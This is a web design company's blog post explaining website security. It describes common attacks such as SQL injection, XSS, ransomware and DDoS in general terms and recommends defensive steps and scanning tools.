X P E R T E R I A

Loading

General

What is website security? Steps to secure your website

  1. By Xperteria
  2. No Comments

01 Mar

website security

Website security is the top priority after creating a website. Whether you run a small business or enterprise, users expect a safe online experience. When customers use an online credit card payment processor, they need to know their data is safe. Visitors do not want their personal information to fall into the wrong hands.

You may not think your site has anything worth being hacked for, but websites are compromised all the time. The majority of website security breaches are not to steal your data or mess with your website layout, but instead attempts to use your server as an email relay for spam, or to set up a temporary web server, normally to serve files of an illegal nature. 

Other very common ways to abuse compromised machines include using your servers as part of a botnet, or to mine for Bitcoins. You could even be hit by ransomware. Hacking is regularly performed by automated scripts written to scour the internet in an attempt to exploit known website security issues in software. Here are some top tips to keep your website secure.

What is website security?

Website security is the measures taken to secure a website from cyberattacks. In this sense, website security is an ongoing process and an essential part of managing a website. It is the protection of your site from malicious online attackers that can access, alter and steal your site’s content and data. It should also protect the personal data and privacy of your site’s users.

When it comes to creating a website, you need to trust that your site and its data is secure. Cyber attacks are on the rise and growing increasingly more sophisticated. This makes them difficult for security professionals to spot, let alone website creators. The right website builder will prioritize security, so you can focus on your business.

Why is website security important?

Website security is important because nobody wants to have a hacked website. Having a secure website is as vital to someone’s online presence as having a website host. If a website is hacked and blocklisted, for example, it loses up to 98% of its traffic. Not having a secure website can be as bad as not having a website at all or even worse.

What does website security include?

Website security involves the right procedures, the right people, as well as the right tools and applications. It often goes beyond just the website and includes web host/web server (for example, Apache/IIS/Nginx) and hosting provider security as well.

Impact of website security breaches

Cyber attacks can have significant, lasting effects on the functionality and performance of your site. In the short term, they can limit traffic growth and conversions. In the long term, they can damage your brand identity and business reputation. Some of the most significant impacts of security breaches include:

1. Customer churn

Users need to know their data is safe in order to trust and use your website, and come back as repeating customers. It is important users trust your site, in order to click on a CTA, or make a purchase. Malicious attacks which lead to the loss of customer’s credentials and sensitive information will undoubtedly affect how your site and business are perceived. This will unfortunately have consequences beyond just your website, affecting your brand reputation and customer service as well.

2. Search engine blacklisting

Search engine blacklisting can be a very harmful consequence of a site security breach. If Google crawls a website and finds malware or malicious code, it may decide to black list the affected site, making it more difficult to find in search. In turn this can also lead to dramatic traffic drops, and have a negative impact on a site’s ability to generate and retain customers.

Likewise, websites that suffer from regular downtime and server errors often experience page indexing issues. If Google crawls a page and comes across a server down error (usually a 500 error), they can decide not to crawl the page again. This has a dramatic impact on a site’s visibility in search and on its ability to attract new visitors.

3. Site suspension

Security attacks can suspend crucial site services, such as login, signups and shopping functions. Consequently, this can make it difficult for users to interact with your site. Since malware is costly to remove and time consuming to fix, it’s much better to pre-empt security attacks with a strong website security plan, than to deal with their aftermath.

Is an SSL certificate enough?

Many businesses think that installing an SSL certificate for your domain name is enough to guarantee cybersecurity. While it is important, it is definitely not enough:

  • An SSL/TLS certificate will protect your website from man-in-the-middle attacks. Nobody will be able to listen in on the communication between the web browser and your web server if the connection is secure.
  • An SSL/TLS certificate will not stop cybercriminals from exploiting a vulnerability in your website code or in your web server configuration.

Most hacked websites are caused by security vulnerabilities in website code and in web server configuration.

Are strong passwords enough?

Strong passwords help you protect your sensitive areas – those that require you to log in to access functionality or information that should not be publicly available. A strong password helps you avoid both brute force and dictionary attacks. 

However, most computer users have a lot of misconceptions about what is a strong password – in short, length and uniqueness (no reuse in different places) are more important than special characters or regular changes. While strong passwords are an important element of security, not just website security, we know of very few major web attacks that were caused by a weak password.

Website attack example

There are a number of ways in which a site’s security may be broached. We’re going to explain some of the most frequently occurring ones and the potential threats they pose to your site here:

1. SQL injections

SQL injections involve the use of search query language (a type of computer code) to take control of a database and extract sensitive information. Such an attack can also be used to edit, modify or delete information within a database, and may even be used to retrieve passwords or user information. According to Akamai’s State of the Internet/Security Report, there were 6.2 billion attempted SQL injections between January 2020 and June 2021, placing them at the top of most common web attacks.

SQL attacks pose a real threat to keeping both your site and its data safe. These cyber attacks can impact your site’s functionality, and lead to the loss of sensitive user data. For example, passwords retrieved from your site might be used to hack your users’ accounts across multiple online platforms.

2. Ransomware

Ransomware is a form of malicious software used to infect computers. Once uploaded it can block access to files, systems, software and applications. Hackers then demand a ransom from the affected user, and once paid, the computer and related files are decrypted and the ransomware removed.

In 2021 organizations, from public hospitals to government bodies, to large corporations, were victims of ransomware attacks. The majority of these ransomware attacks were the result of phishing— computers and systems became infected when employees received a phishing email and then clicked on a malicious link within it.

Ransomware attacks are on the rise and 2021 was a particularly busy year with 37% of corporate organizations reported being the victims of a ransomware attack. In the first half of 2021 alone, the FBI reported a 62% year-on-year increase of such attacks.

3. Cross-site scripting (XSS)

A cross-site scripting attack occurs when malicious javascript code is injected through a trusted website into a user’s browser. This type of attack works similarly to an SQL injection attack and preys on the inability of browsers to differentiate between malicious and harmless markup text. Browsers simply render whatever text they receive, regardless of its intent.

Cross-site scripting is often used to steal a user’s cookies (stored information) and pose as them online. It can also be used to edit websites, collect secure user credentials (e.g. passwords or credit card numbers). Between January 2020 and June 2021, there were an estimated 1.019 billion such attacks, so it goes without saying that protecting against cross-site scripting is an important part of website security.

4. Credential reuse

When user credentials are stolen, it can impact more than just your website. They can be used to access multiple sites where the same credentials apply and create damage that extends across many websites at once.

Credential reuse attacks are one of the most common threats to site security, in part because users commonly repeat their credentials over multiple sites and online platforms. Therefore, hacking just one of these gives access to more than just the site they were stolen from.

5. DoS/DDoS attacks

DoS (denial of service) attacks aim to interrupt the functionality and usability of a website. One of the most common forms is a “distributed denial of service” (DDoS) attack. This is when a bot sends huge amounts of fake traffic to a website from multiple sources in an attempt to overload the server.

DoS attacks cause server time out, and will render the attacked website inaccessible. This can be incredibly harmful for websites of all sizes, negatively impacting performance.

Steps to improve your website security

Making sure your site is secure starts with choosing the right website builder. Opt for one that prioritizes website security, leaving you free to focus on managing your site. Here’s a run down of some of the steps both you, and your website builder should take to protect your site:

1. Core platform and 3rd party updates

Despite the known risks from cyber attacks, your site’s security should be something you can take for granted. This might sound counterintuitive, but hear us out.

Building your website on a platform that’s monitored 24/7 means complete peace of mind when it comes to the security of your site, and by extension—your business. A platform that scans for vulnerabilities and makes updates in response to these is ahead of the game when it comes to securing your site.

Third party apps can be a major source of site security breaches, with the potential to harm millions of sites at once. To avoid this happening, we recommend choosing a website builder that contains as many built-in features as you need to run your business. Leaving you less dependent on third party apps, and more focused on your business.

2. SSL protocols

A secure website will include a SSL (Secure Sockets Layer) protocol, which can be spotted by the https at the front of a domain name within a site’s url. SSL protocol protects communication between the website and server by encrypting it. This prevents hackers from reading or interfering with the information passed from one to the other. A SSL protocol should be standard on any new site created, but is especially important on those that perform online transactions and sales. Recently, SSL protocols have been updated to handle more sophisticated attempts to breach its encryption.

When choosing a website builder, you’ll automatically create a site with extra layers of protection, using the most updated and secure protocol:  TLS 1.2. You can create and manage any type of site you need—from a personal website, to an ecommerce site—rest assured that your data, and that of your customers, is protected in line with the highest industry standards.

3. Secure web hosting

There are many layers of protection necessary to secure a site, and reliable web hosting is an integral part of this. Secure web hosting is a must, and will prevent attacks on your website through your server. It’s also important that your hosting is screened regularly to ensure it’s prepared for any threats, including DDoS, that comes its way.

Ideally, secure hosting should involve continual testing and 24/7 monitoring to guarantee it can withstand even the most advanced cyber threats. It should also be GDPR compliant and adhere to international standards regarding online privacy and security.

4. Established admin privileges

Large sites especially need a team of people to manage them, and each will require varying degrees of access. Make sure to think carefully about just how much access a website manager needs to do their job, then award admin access to your site accordingly. Blindly granting full access to everyone who works on your site will leave it more vulnerable to attacks.

We also recommend writing a security policy that applies to all site admins. This should include: choosing a password, third party app downloads, and other important site management tasks to make sure your entire team has your site’s security as their number one priority.

5. Site backup

While the best website security methods involve pre-empting attacks, in the event of a security breach, quick recovery will depend on your site being backed up. This means saving a version of your site separately, and making sure it can be  restored should the original be attacked in any way.

Many website builders automatically backup all their sites. You don’t need to do anything, but rest assured that your site is saved. If you’re not sure that your site is automatically backed up, we recommend checking with your website builder or your site developer from the get-go, to make sure.

6. Change default CMS settings

Your site is easier to hack if your default CMS (content management system) settings haven’t been changed. Make sure to alter these when making your site. For example, you can start by changing your comments and user settings — one way to do this is by assigning different privilege roles to each of your site’s admin.

Changes to these default settings make it more difficult for hackers to understand your system, leaving it less vulnerable to attacks. Increasing numbers of cyber attacks are automated, executed by bots who understand and can breach the default settings of many CMS. Changing these settings makes it more difficult for these bots to read, and attack your platform.

7. Follow password best practices

Changing your site password regularly can protect you against credential attacks. Opt for strong passwords—making sure to use a mix of numbers, letters and characters  (pro tip: the longer, the safer.) Other important credential practices include: never share your password or save it on your browser. Always avoid using the same one across different sites. Make sure everyone who has access to your site knows how to keep their login credentials safe.

It’s also highly recommended to set up multi-factor authentication (MFA). This makes it more difficult for potential hackers to access your site. MFA will involve adding another level of login authentication, such as a push notification from a mobile device.

8. Get website security tools

Once you think you have done all you can then it’s time to test your website security. The most effective way of doing this is via the use of some website security tools, often referred to as penetration testing or pen testing for short.

There are many commercial and free products to assist you with this. They work on a similar basis to script hackers in that they test all known exploits and attempt to compromise your site using some of the previously mentioned methods such as SQL Injection. Some free tools that are worth looking at:

  • Netsparker (Free community edition and trial version available). Good for testing SQL injection and XSS
  • OpenVAS Claims to be the most advanced open source security scanner. Good for testing known vulnerabilities, currently scans over 25,000. But it can be difficult to setup and requires a OpenVAS server to be installed which only runs on *nix. OpenVAS is a fork of Nessus before it became a closed-source commercial product.
  • SecurityHeaders.io (free online check). A tool to quickly report which security headers mentioned above (such as CSP and HSTS) a domain has enabled and correctly configured.
  • Xenotix XSS Exploit Framework A tool from OWASP (Open Web Application Security Project) that includes a huge selection of XSS attack examples, which you can run to quickly confirm whether your site’s inputs are vulnerable in Chrome, Firefox and IE.

The results from automated tests can be daunting, as they present a wealth of potential issues. The important thing is to focus on the critical issues first. Each issue reported normally comes with a good explanation of the potential vulnerability. You will probably find that some of the medium/low issues aren’t a concern for your site.

Final thoughts

As a business owner and webmaster, you cannot merely set up a website and forget it. Although website creation is easier than ever, it does not change the fact that security maintenance is necessary.

Always be proactive when it comes to protecting your company’s and customer’s data. Whether your site takes online payments or personal information, the data visitors enter into your site must land in the right hands.Securing your site and learning how to protect against hackers is a big part of keeping your site healthy and safe in the long run.

No Comments